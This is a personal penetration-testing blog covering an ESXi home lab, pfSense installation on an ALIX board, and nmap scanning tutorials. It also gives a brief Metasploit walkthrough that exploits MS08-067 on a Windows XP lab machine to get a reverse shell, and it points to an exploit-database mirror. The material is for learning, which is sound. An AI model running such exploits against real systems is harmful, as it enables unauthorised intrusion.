just another hacking webblog

Building new Hacking LAB,

going to use my *new* HP Proliant N36L Microserver

At A Glance –>

• Processor:
  • AMD Athlon™ II NEO N36L
  • AMD RS785E/SB820M chipset
• Memory:
  • Two (2) DIMM slots
  • 1GB (1x1GB) Standard/8GB Maximum, using PC3-10600E DDR3 Unbuffered (UDIMM) ECC memory, operating at max. 800MHz
• Storage Controller:
  • Embedded AMD SATA controller with RAID 0, 1
  • Embedded AMD eSATA controller for connecting external storage devices via the eSATA connector in the rear of the server
• Storage Drive Support:
  • 4 Internal HDD Support
  • Maximum internal SATA storage capacity of up to 8.0TB (4 x 2TB 3.5″ SATA drives)
• Network Controller:
  • Embedded NC107i PCI Express Gigabit Ethernet Server Adapter
• Expansion Slots:
  • Slot 1: PCI-Express Gen 2 x16 connector with x16 link
  • Slot 2: PCI-Express Gen 2 x1 connector with x1 Link
  • Slot 2-2: PCI-Express x4 slot for optional management card
• USB 2.0 Ports:
  • Seven (7) USB 2.0 ports: 4 front , 2 rear, 1 internal (for tape)
• Power Supply:
  • 150 Watts Non-Hot Plug, Non Redundant Power Supply
• Management:
  • Optional MicroServer Remote Access Card
• Operating System:
  • Supports Windows and Red Hat Linux
• Form Factor:
  • Ultra Micro tower

The GOAL: to create a server where virtual machines can be created and a virtual network can be build.

I have decided to use VMWARE for this – VMWare ESXi 4.1

This VMware vSphere Hypervisor can be downloaded here.

I had 4 x 320Gb Seagate SATA hard drives already …

The system board has a internal USB 2.0 port, I will put a USB stick in this port ,that I will be used to boot and run the VMware vSphere Hypervisor.

For this I will be using a Kingston’s DataTraveler® Ultimate 3.0 G2

Speed of USB Stick

• When plugged to a USB 3.0 system:
  • Read speed up to 100MB/s
  • Write speed up to 70MB/s
• When plugged to a USB 2.0 system:
  • Maximum specification performance (around 30MB/s read and write

I will be upgrading the internal memory to 8GB, for this I used Kingston ValueRam KVR1333D3N9K2/8G

There is a nice video on YouTube of how to take the system board out to upgrade the memory, that can be found here.

I then put the 4 hard drives into the trays (4 trays is supplied by default) , and insert them into the drive bays.

The system comes with a 250Gb Seasgate disk, by default , I will use that for something else.

In the BIOS the RAID has to be setup, you have a choice of RAID 0 and RAID 1. I will use RAID 0 (also known as a stripe set or striped volume) for performance.

Add a 4 x 320Gb drive into one RAID 0 Volume, this will give you 1.2Tb usable drive space.

There is a 5.25″ bay for a optical drive, but I used a USB DVD-Writer, that I used to boot the boot disk I created from the VMWare ESXi 4.1 ISO image.

I then installed the VMware vSphere Hypervisor on the Kingston’s DataTraveler® Ultimate 3.0 G2 that I plugged into the internal USB port on the system board.

Remember: In the BIOS set the USB DVD-Writer to boot first.

The VMware setup starts, choose to install it to the USB Disk.

When the installation finished, it will pick up a DHCP IP address.

Browse to the url http://hackrack/

Download the Download vSphere Client.

Install the client, then connect to the VMware ESXi Server.

Add here is my own VMware vSphere Hypervisor to install my own Hacking Lab GOODIES….

Mmmmm……

….

I have been a instructor @ The Hacking Dojo for a while now ….

Currently I am the instructor for the following 2 classes :  -

(1R) Mukyu (Novice) and the (1D) Shodan (Foundational)

About the Dojo

Many hacking classes provide a rapid amount of information to students, and then send them off to continue their education on their own; there is no real concern about how the students are doing after the course has finished, or how much of the course material is retained. The Hacking Dojo breaks this trend, and offers a unique method of learning how to conduct professional penetration tests through student mentoring.

The Hacking Dojo provides students with a long-term training and support system, with readily-available access to instructors. Students attend regularly-scheduled online meetings with their instructor, who teaches hacking concepts relative to students’ skill level. When the students demonstrate proficiency in a set of skills, they are moved onto more difficult challenges and instruction.

Benefits of the Hacking Dojo instruction method:

• Live, online training sessions with the class instructor each week

• Video tutorials on hacking, geared towards personal skill level

• Participation in interactive student groups

• Real-time access to instructor during non-class hours

• Access to special tools and tutorials

Windows XP Service Pack 3 can easily be hacked with Metasploit Framework3.

I’m using Backtrack4-R1 as the “attacker” with IP address 192.168.1.10 and Windows XP Service Pack 3 as the “victim” with IP address 192.168.1.11.

Boot Backtrack -

Login with username “root” and password “toor”.

Assign the IP address.

Do a nmap scan with OS fingerprinting.

Start metasploit.

Use the exploit windows/smb/ms08_067_netapi

Set the payload windows/shell/reverse_tcp

Show the options.

set RHOST=192.168.1.11

set LHOST=192.168.1.10

then run “exploit”

we are in!!!

run a command to confirm.

!!!HACKED!!!

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

This is the updated change log:
Added Proxy support for Cain’s Certificate Collector.
Added the ability to specify custom proxy authentication credentials for Certificate Collector.
Added ProxyHTTPS Man-in-the-Middle Sniffer (TCP port 8080).
HTTP, APR-HTTPS and APR-ProxyHTTPS sniffer filters are now separated.
OpenSSL library upgrade to version 0.9.8q.
Winpcap library upgrade to version 4.1.2.

Download Cain & Abel v4.9.39

Milw0rm (also called milwOrm) is a group of “hacktivists” , now back with new domain 1337day.com

Its Inj3ct0r 1337 Team exploits and 0day exploits database site. Mirror : http://77.120.120.218/

Step1: Get a ALIX 6E1

link to Netgate’s ALIX 6E1.

I got my firewall yesterday….mmmmmm.

It was $175,00 from Netgate. This converts to plus minus ZAR 1 226,00.

With shipping , it came to $306.46 with shipping (I used FedEx International Priority – $131.46).

This converts to about ZAR 2 147,00.

The kit includes:

* ALIX.6E1 system board (2/1/1/256/LX800)
* Laser etched red aluminum enclosure with USB and antenna cutouts
* Blank 2 GB Sandisk Ultra II CF Card
* 15V 1.25A 18W power supply (US 3 prong plug style)

The system board looks like this -

The SPEC’s -
CPU: 500 MHz AMD Geode LX800
DRAM: 256 MB DDR DRAM
Storage: CompactFlash socket
Power: DC jack or passive POE, min. 7V to max. 20V
Three front panel LEDs, pushbutton
Expansion: 1 miniPCI slot, 1 miniPCI Express slot (USB only), LPC bus
Connectivity: 2 Ethernet channels (Via VT6105M 10/100)
I/O: DB9 serial port, dual USB port
Board size: 6 x 6″ (152.4 x 152.4 mm)
Firmware: tinyBIOS

NOTE: In South Africa you will need a converter for the power plug – USA to South Africa (2 or 3 point plug). I got one from a luggage shop for R75,00. The power supply will be fine(if you look on the bottom), if it says “100-240V, 50/60 Hz”, it will work anywhere in the world with the right plugs.

NOTE: You need a Compact Flash card writer for installing the pfSense operating system, I had a 6-in-1 card reader that I got a while back.

Second Step: Download the necessary packages

They needed the embedded version specifically created for the 2 GB CF card size. The embedded version performs only reads from the flash card, with read/write file systems as RAM disks as compact flash cannot handle many write operations. The embedded versions can be found on pfSense’s mirror list.

I downloaded the 2 files – pfSense-1.2.3-RELEASE-2g-nanobsd.img.gz and the pfSense-1.2.3-RELEASE-2g-nanobsd.img.gz.md5. This 2 GB embedded image for my 2 GB Sandisk Ultra II CF Card that I got in the ALIX.6E1 kit.

NOTE: It’s important to always download the MD5 file as well, and then to check download, to make sure the image have not been tampered with. There are various tools to do this for you, a very easy one is ExactFile, it runs on windows and it’s free. It can be downloaded here.

Install ExactFile, check the downloaded file for it’s MD5 hash. Open the MD5 file that you downloaded in a text editor and compare the hashes to see if they match.

You will also need to download physdiskwrite. This is a small Windows NT/2000/XP command line tool that makes it possible to write disk images onto raw disks, like CF cards.

Special considerations for Windows Vista/7
physdiskwrite works with Vista/7, but you must make sure to run it as administrator (simply having admin rights isn’t enough), or it won’t find any disks. One way to do this is to create a shortcut to cmd.exe, then right-click it and select “run as administrator”. Then you can launch physdiskwrite from the command prompt window that appears, and it should work fine.

NOTE: If you get write errors shortly after physdiskwrite has begun writing to the target disk (usually after 65536 bytes), this may be caused by existing partitions on the disk. Use the Disk Management utility (right-click on the “Computer” icon on the desktop and select Manage, then navigate to Computer Management (Local)/Storage) to delete all partitions on the target disk before starting physdiskwrite.

If you are unable to delete all the partitions with the Disk Management utility, try the following procedure:

1. Open a command window as admin (“cmd”)
2. Type “diskpart” and hit enter.
3. Type “list disk” and hit enter to find out the number of your drive.
4. Type “select disk X” (where you replace X with the number of your drive) and hit enter.
5. Type “clean” and hit enter.

Third Step: Install the pfSense operating system on my CF card

pfSense’s documentation does a good job. In there is states -
Before you begin with pfSense 1.2.3 NanoBSD images, you might want to check out the following articles:
1. NanoBSD on WRAP
2. ALIX BIOS Update Procedure

To install the pfSense operating system, I used the physdiskwrite method.

C:\>physdiskwrite.exe pfSense-1.2.3-2g-20091207-1914-nanobsd.img

physdiskwrite v0.5.2 by Manuel Kasper 

Searching for physical drives...

Information for \\.\PhysicalDrive0:
   Windows:       cyl: 91804
                  tpc: 224
                  spt: 19
   C/H/S:         16383/16/63
   Model:         ST3200822AS
   Serial number:             3LJ39Y8V
   Firmware rev.: 3.01

Information for \\.\PhysicalDrive1:
   Windows:       cyl: 243
                  tpc: 255
                  spt: 63

Information for \\.\PhysicalDrive2:
DeviceIoControl() failed on \\.\PhysicalDrive2.

Information for \\.\PhysicalDrive3:
DeviceIoControl() failed on \\.\PhysicalDrive3.

Information for \\.\PhysicalDrive4:
DeviceIoControl() failed on \\.\PhysicalDrive4.

Which disk do you want to write? (0..1) 1
About to overwrite the contents of disk 1 with new data. Proceed? (y/n) y
2000158720/2001194496 bytes writtenWrite error after 2000158720 bytes.

C:\>

Fourth Step: Find a desktop PC for a serial connection to the Alix

Check the bootup process there by using a null modemcable and a terminal program. You’ll need either a USB to serial converter cable or a desktop PC to connect the serial cable. I used PuTTYtel , but you can use any program.

Fifth Step: Bootup the device and fire up PuTTYtel on my Windows system

In PuTTYtel go to Category -> Connection -> Serial

Use the following settings for the connection:
* Baud rate: 9600
* Data: 8 bit
* Stop: 1 bit
* Parity: None
* Flow control: None

Go to Category -> Session -Choose serial and OPEN then power on the device.

It goes through the boot process, and ends like this.

pfSense is by default assigned an ip of 192.168.1.1. Open your browser and navigate to http://192.168.1.1.

If you choose to login the username is ‘admin’ and the password is ‘pfsense’.

Completely Installed…

nmap is the tool any Penetration Tester/ Ethical Hacker can’t do without.

The tool can be downloaded from – http://nmap.org

I will use scanme.nmap.org as the target system for the demonstration:

[root@byte ~]# ping -c 3 scanme.nmap.org
PING scanme.nmap.org (64.13.134.52): 56 data bytes
64 bytes from 64.13.134.52: icmp_seq=0 ttl=54 time=162.937 ms
64 bytes from 64.13.134.52: icmp_seq=1 ttl=54 time=158.487 ms
64 bytes from 64.13.134.52: icmp_seq=2 ttl=54 time=154.497 ms

--- scanme.nmap.org ping statistics ---
3 packets transmitted, 3 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 154.497/158.640/162.937/3.447 ms

When we run the nmap command against scanme.nmap.org

[root@byte ~]# nmap scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:13 CST
Interesting ports on scanme.nmap.org (64.13.134.52):
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 34.15 seconds
[root@byte ~]#

The scan it runs by default is the TCP SYN Scan, also known as the Stealth of Half Scan. As you can see it give you a list of interesting ports, with a state and a service that might be running on that port.

I normally start with a host discovery with a ping scan, this goes no further than to determine if the host is online.

[root@byte ~]# nmap -sP scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:28 CST
Host scanme.nmap.org (64.13.134.52) is up (0.16s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
[root@byte ~]#

You can run a list scan, but this only gives you a list of targets to scan

[root@byte ~]# nmap -sL scanme.nmap.org

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:28 CST
Host scanme.nmap.org (64.13.134.52) not scanned
Nmap done: 1 IP address (0 hosts up) scanned in 0.24 seconds
[root@byte ~]#

This scan will, probably only be used, to determine if what the network range that you want scan involves…something like…

[root@byte ~]# nmap -sL 64.13.134.48/28

Starting Nmap 5.00 ( http://nmap.org ) at 2011-01-14 06:35 CST
Host nmap.org (64.13.134.48) not scanned
Host insecure.org (64.13.134.49) not scanned
Host seclists.org (64.13.134.50) not scanned
Host sectools.org (64.13.134.51) not scanned
Host scanme.nmap.org (64.13.134.52) not scanned
Host research.nmap.org (64.13.134.53) not scanned
Host cust-134-54.titan.net (64.13.134.54) not scanned
Host cust-134-55.titan.net (64.13.134.55) not scanned
Host cust-134-56.titan.net (64.13.134.56) not scanned
Host cust-134-57.titan.net (64.13.134.57) not scanned
Host ns1.titan.net (64.13.134.58) not scanned
Host ns2.titan.net (64.13.134.59) not scanned
Host wwwr.titan.net (64.13.134.60) not scanned
Host nswc1.titan.net (64.13.134.61) not scanned
Host nswc2.titan.net (64.13.134.62) not scanned
Host 64.13.134.63 not scanned
Nmap done: 16 IP addresses (0 hosts up) scanned in 0.21 seconds
[root@byte ~]#

as you can see no scanning, just listing.

I upgraded my nmap version to nmap-5.36.t4 , there are other interresting things that comes with this like NPING and NCAT (Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat)

But I will blog about that a bit later….

I decided, rather than going through the NMAP reference guide, I wanted to show you some nicer things to do with NMAP…well at least I think it’s nicer

TCP connect scan (-sT)

This is you tipical 3-way handshake (SYN–>SYN-ACK–>ACK). The host sends out a SYN packet, the target responds wit h a SYN-ACK packet, the host then responds with a ACK packet. Then the communications channel is established and traffic can flow.

[root@byte ~]# nmap -sT scanme.nmap.com

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:02 CST
Nmap scan report for scanme.nmap.com (64.13.134.52)
Host is up (0.045s latency).
rDNS record for 64.13.134.52: scanme.nmap.org
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 41.77 seconds
[root@byte ~]#

Ok, you see a couple of ports open.

A interesting thing to use is –packet-trace. The –packet-trace option causes Nmap to print a summary of every packet it sends and receives. This is helpful when trying to understand how Nmap works, and for debugging.

Lets take ssh for a example:

[root@byte ~]# nmap --packet-trace -p 22 -sT scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:26 CST
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Echo request (type=8/code=0) ttl=58 id=45864 iplen=28
SENT (0.0550s) TCP 72.200.200.200:47740 > 64.13.134.52:443 S ttl=59 id=2266 iplen=44  seq=768689839 win=4096 
SENT (0.0550s) TCP 72.200.200.200:47740 > 64.13.134.52:80 A ttl=51 id=50330 iplen=40  seq=0 win=4096
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Timestamp request (type=13/code=0) ttl=45 id=35095 iplen=40
RCVD (0.0990s) ICMP 64.13.134.52 > 72.200.200.200 Echo reply (type=0/code=0) ttl=52 id=17449 iplen=28
NSOCK (0.2550s) UDP connection requested to 72.232.192.2:53 (IOD #1) EID 8
NSOCK (0.2550s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 18
NSOCK (0.2550s) Write request for 43 bytes to IOD #1 EID 27 [72.232.192.2:53]: .............52.134.13.64.in-addr.arpa.....
NSOCK (0.2550s) Callback: CONNECT SUCCESS for EID 8 [72.232.192.2:53]
NSOCK (0.2550s) Callback: WRITE SUCCESS for EID 27 [72.232.192.2:53]
NSOCK (0.2560s) Callback: READ SUCCESS for EID 18 [72.232.192.2:53] (184 bytes)
NSOCK (0.2560s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 34
CONN (0.2560s) TCP localhost > 64.13.134.52:22 => Operation now in progress
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.044s latency).
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
[root@byte ~]#

NOTE: I used fake ip’s .. just in case

TCP stealth (half) scan (-sS)

This scan only sends out packets like this (SYN–>SYN-ACK). The host send a SYN packet, and the target reponds with a SYN-ACK packet, but the host never sends a ACK packet back to the target.

[root@byte ~]# nmap -sS scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:18 CST
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.045s latency).
Not shown: 993 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
25/tcp    closed smtp
53/tcp    open   domain
70/tcp    closed gopher
80/tcp    open   http
113/tcp   closed auth
31337/tcp closed Elite

Nmap done: 1 IP address (1 host up) scanned in 14.75 seconds
[root@byte ~]#

now lets try this with the –packet-trace option

[root@byte ~]# nmap --packet-trace -p 22 -sS scanme.nmap.org

Starting Nmap 5.36TEST4 ( http://nmap.org ) at 2011-01-28 05:27 CST
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Echo request (type=8/code=0) ttl=58 id=64459 iplen=28
SENT (0.0550s) TCP 72.200.200.200:35214 > 64.13.134.52:443 S ttl=48 id=3099 iplen=44  seq=3743350257 win=1024 
SENT (0.0550s) TCP 72.200.200.200:35214 > 64.13.134.52:80 A ttl=40 id=33163 iplen=40  seq=0 win=1024
SENT (0.0550s) ICMP 72.200.200.200 > 64.13.134.52 Timestamp request (type=13/code=0) ttl=52 id=22089 iplen=40
RCVD (0.0990s) ICMP 64.13.134.52 > 72.200.200.200 Echo reply (type=0/code=0) ttl=52 id=17450 iplen=28
NSOCK (0.2550s) UDP connection requested to 72.232.192.2:53 (IOD #1) EID 8
NSOCK (0.2550s) Read request from IOD #1 [72.232.192.2:53] (timeout: -1ms) EID 18
NSOCK (0.2550s) Write request for 43 bytes to IOD #1 EID 27 [72.232.192.2:53]:  64.13.134.52:22 S ttl=56 id=9289 iplen=44  seq=1621599360 win=1024 
RCVD (0.3020s) TCP 64.13.134.52:22 > 72.200.200.200:35214 SA ttl=52 id=0 iplen=44  seq=2276068255 win=5840 
Nmap scan report for scanme.nmap.org (64.13.134.52)
Host is up (0.044s latency).
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
[root@byte ~]#

to be continued…..

pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. The project started in 2004 as a fork of the embedded firewall software package called m0n0wall. pfSense is focused towards full PC installations rather than the embedded hardware focus of m0n0wall.

This is one of the most powerful, yet simple software firewalls. It can stand it’s ground to any hardware firewall on the market, and it’s very easy to install.

Get a copy today and start playing – www.pfsense.org

It’s also available as a VMWare appliance…

There are numerous tutorials available.

PaulDotCom did a awesome mini tech segment -

Installing pfSense on an Alix.6e1

The ALIX.6e1 hardware platform:

2 10/100 LAN / 1 miniPCI / 1 miniPCI Express / AMD LX800 / 256 MB / 2 USB / DB9 serial port / CF Card slot / Board size: 6 x 6

First Step: Get a ALIX 6E1

link to Netgate’s ALIX 6E1. Netgate’s ALIX 6E1 Costs $175.

The kit includes:

• ALIX.6E1 system board (2/1/1/256/LX800)
• Laser etched red aluminum enclosure with USB and antenna cutouts
• Blank 2 GB Sandisk Ultra II CF Card
• 15V 1.25A 18W power supply (US 3 prong plug style)

You will also need a Compact Flash card writer for installing the pfSense operating system. The one they used costs $10.00

Next you will need the pfSense & physdiskwrite Software, Cost: FREE!

Second Step: Download the necessary packages

They needed the embedded version specifically created for the 2GB CF card size. The embedded version performs only reads from the flash card, with read/write file systems as RAM disks as compact flash cannot handle many write operations. The embedded versions can be found on pfSense’s mirror list

Third Step: Install the pfSense operating system on our CF card

pfSense’s documentation does a good job. We used a Windows PC as all our other boxes were busy umm analyzing pr0n, so we opted for the physdiskwrite method.

WARNING: Follow the documentation’s advice and be sure you are not overwriting the wrong disk!

C:\Documents and Settings\All Users\Documents>physdiskwrite.exe pfSense-1.2.3-2g
-20091207-1914-nanobsd.img

physdiskwrite v0.5.2 by Manuel Kasper <mk@neon1.net>

Searching for physical drives...

Information for \\.\PhysicalDrive0:
   Windows:       cyl: 19452
                  tpc: 255
                  spt: 63
   C/H/S:         16383/16/63
   Model:         ST3160812AS
   Serial number:             9LS0V1FC
   Firmware rev.: 3.ADH

Information for \\.\PhysicalDrive1:
DeviceIoControl() failed on \\.\PhysicalDrive1.

Information for \\.\PhysicalDrive2:
   Windows:       cyl: 244
                  tpc: 255
                  spt: 63

Information for \\.\PhysicalDrive3:
DeviceIoControl() failed on \\.\PhysicalDrive3.

Information for \\.\PhysicalDrive4:
DeviceIoControl() failed on \\.\PhysicalDrive4.

Which disk do you want to write? (0..2) 2
About to overwrite the contents of disk 2 with new data. Proceed? (y/n) y
2001194496/2001194496 bytes written in total

C:\Documents and Settings\All Users\Documents>

Fourth Step: Find a desktop PC for a serial connection to the Alix

You’ll need either a USB to serial converter cable or a desktop PC to connect the serial cable. In OS X I’ve used the USB to Serial cable and software called “Zterm”. You can also use the command line utility called “screen”, or several other free programs.

Fifth Step: Bootup the device and fire up Window’s hyperterminal

Use the following settings for the connection:

• Baud rate: 9600
• Data: 8 bit
• Parity: None
• Stop: 1 bit
• Flow control: None

Now we boot into pfSense. As the bootloader comes there are 7 options listed. The first choice you will be asked is

“Do you want to set up     VLAN's now [y|n]?”  select no or 'n'.  

Then you are asked to

“Enter your LAN interface name”,  

We used ‘fxp1′. Next,

“Enter your WAN interface name”  

We entered ‘fxp2′. Next,

“Enter the Optional 1 interface name”,  

here we used ‘fxp0′.

Using the above examples, you'd see  “The interfaces will be assigned as follows:”
LAN  -> fxp1
WAN ->  fxp2
OPT1 -> fxp0

Do you want to proceed [y|n]?                      (make sure you enter 'y' here).

pfSense is now running in RAM and almost fully functional. If you wish you may plug your LAN interface into a hub or switch and connect via the web interface. pfSense is by default assigned an ip of 192.168.1.1. Open your browser and navigate to http://192.168.1.

• If you choose to login the username is ‘admin’ and the password is ‘pfsense’.

The original post can be found at -

Installing pfSense on an Alix.6e1 by InternMike & PaulDotCom

My NEW YEARS resolution…BLOG dammit.

I want to frequently blog this year.

Penetration Testing/Ethical Hacking is my passion, so the topic will probably be along those lines.

Hope it’s worth the read .

I am struggling to blog. I have lots of information to share, but I find it difficult to write it down…

I have been trying to become a full blown penetration tester. I have been in the IT security field for about 12 years now. I lack direction and experience…

I need a mentor, but finding that has seem so have been a impossible task.

I am very eager to get involved with the hacking community, I believe I have lots to offer, but I am not sure how to go about it.